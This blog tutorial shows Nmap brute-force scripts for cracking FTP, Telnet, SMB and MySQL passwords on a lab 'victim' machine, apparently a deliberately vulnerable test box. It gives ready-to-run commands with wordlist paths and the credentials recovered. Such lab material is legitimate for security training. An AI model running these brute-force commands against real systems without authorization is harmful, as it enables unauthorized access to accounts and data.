In previous practical I had used basic command to scan victim’s PC and found open ports like ftp, Ssh, telnet, snmp and etc. You can check from here. But now the question is if we found open ports what else we can do to retrieve the information of victim using nmap scripts? To know your answer read ahead.
FTP BRUTE
Crack password using nmap brute script of FTP.
nmap -p21 –script ftp-brute.nse –script-args
userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
From the scanning result I have successfully got the FTP password of victim pc
msfadmin:msfadminas username and password.
TELNET BRUTE
Crack password using nmap brute script of telnet.
nmap -p23 –script telnet-brute.nse –script-args
userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
I have successfully got the TELNET password of victim pc msfadmin:msfadminas username and password.
SMB BRUTE
Crack password using nmap brute script of SMB
Nmap –p445 –script smb-brute.nse –script-args
userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
I have successfully got the SMB password of victim pc msfadmin:msfadmin and user:useras username and password.
MYSQL BRUTE
Crack password using nmap brute script of MYSQL server
Nmap -sT -p3306 –script mysql-brute.nse –script-args userdb=/root/Desktop/user.txt 192.168.1.105
Here I found two user as root and guest with empty password for MySQL server
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.
The post Password Cracking using Nmap appeared first on Hacking Articles.